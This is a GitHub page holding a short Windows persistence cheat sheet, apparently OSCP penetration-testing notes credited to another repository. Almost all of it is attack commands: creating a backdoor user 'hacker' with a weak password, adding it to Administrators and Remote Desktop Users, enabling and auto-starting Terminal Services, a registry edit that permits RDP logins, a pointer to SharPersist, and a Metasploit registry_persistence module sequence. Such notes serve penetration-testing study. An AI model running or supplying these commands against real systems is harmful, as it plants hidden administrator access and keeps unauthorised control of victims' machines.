-
-
Notifications
You must be signed in to change notification settings - Fork 105
/
Copy pathPersistence_Windows
33 lines (23 loc) · 925 Bytes
/
Persistence_Windows
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
FULL CREDIT: https://github.com/s0wr0b1ndef/OSCP-note/blob/master/persistence/persistence_windows.txt
I TAKE NO CREDIT!
# Add Windows user:
net user /add hacker 1234567
# Add user to Administrators groups
net localgroup administrators /add hacker
# Add user to Remote Desktop user group
net localgroup "Remote Desktop users" hacker /add
# Start Remote Desktop service
net start TermService
# Is Remote Desktop Service running?
tasklist /svc | findstr /C:TermService
# Permanently enable Terminal Services
sc config TermService start=auto
# Enable Terminal services through registry // reboot after
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# SharPersist
https://github.com/fireeye/SharPersist
# Metasploit module for in memory persistence
In metasploit:
use exploit/windows/local/registry_persistence
set session <SESSION NO>
run